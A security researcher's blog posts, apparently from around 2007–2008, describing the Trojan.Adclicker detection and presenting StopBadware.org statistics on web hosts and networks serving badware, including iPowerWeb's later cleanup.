Trojan.Adclicker is a generic class of Trojan Horses that are designed to artificially generate traffic to certain Web sites. These Trojans send HTTP requests to simulate clicks on banner advertisements, or to inflate Web counter statistics.

According to VirusTotal two other Anti-Virus products identify this file as a trojan (Ikarus: Trojan-Spy.Win32.Mslagent & TrendMicro: TROJ_ADCLICKE.IX).

While this is nothing like the report I recently released, it is another indicator that Skype needs to do something about their relationship with TOM.

Badware Success Story



Last year I analyzed data from StopBadware.org’s Badware Website Clearinghouse and found that iPowerWeb was the number one top infected host for badware. StopBadware conducted further tests and followed up with iPowerWeb; the company responded positively. In StopBadware’s 2008 report iPowerWeb is no longer among the top ranked badware hosts having “used Google’s data and cooperated with StopBadware.org to clean and protect thousands of infected sites.” A badware success story.

Badware Hosting Companies



Following some POC analysis, stopbadware.org issued a press release of analysis of the badware URLs in their database.

StopBadware.org analyzed 49,296 sites – sites submitted by trusted third parties to the StopBadware.org Badware Website Clearinghouse – and identified the following web hosting companies with the largest number of infected sites residing on their servers:
* iPowerWeb, Inc., (10,834)
* Layered Technologies, (2,513)
* ThePlanet.com Internet Services, Inc, (2,056)
* Internap Network Services, (1,437)
* CHINANET Guangdong province network, (786)

IPowerWeb responded positively and “has located and removed badware-distributing code from thousands of its sites”.

Badware URL Analysis



One of the projects I am affiliated with in an advisory capacity is the Berkman Center’s StopBadware.org project. Over the weekend (2007-03-25) I scraped and analyzed the 18328 badware URLs from StopBadware.org’s Badware Website Clearinghouse, a “a collaborative effort to build a comprehensive list of websites that host, link to, or otherwise distribute badware”. The results are available here.

The source of all of the URLs (100%) was Google, one of the corporate sponsors of StopBadware.org. Although there are 18328 URLs there were only 6856 distinct IP addresses and 0.4% of the URL’s were given a decision of “Badware” — “Sites that StopBadware has tested itself and determined to contain or link to badware” –, with the balance being listed as “Undetermined”.

  • The top TLD’s were .com: 10710, .org: 1550, .info: 1352, .net: 1300 followed by the ccTLD’s cn: 1216, .ru: 352, .uk: 275, .ua: 226, .it: 129 and .pl: 118.
  • The top countries (based on IP allocation) in which badware URLs are hosted are US: 10037, CN: 4336, ?? (unknown): 1357, DE: 433, RU: 361, GB: 349, UA: 210, IT: 186, CA: 154 and NL: 81.
  • The top AS number are AS30380: 3435, AS4134: 1819, AS17233: 1537, ASNA (unknown): 1315 and AS21844: 734.
  • The top network names are IPOWER – iPowerWeb, Inc.: 3435, CHINANET-BACKBONE No.31,Jin-rong Street: 1819, ATT-CERFNET-BLOCK – AT&T Enhanced Network Services: 1537 NA (unknown: 1315 and THEPLANET-AS – THE PLANET: 734.

An interesting note is that Google appears as the 13th (GOOGLE – Google Inc.: 169) network name with 169 badware URLs all of which appear to be *.blogspot blogs.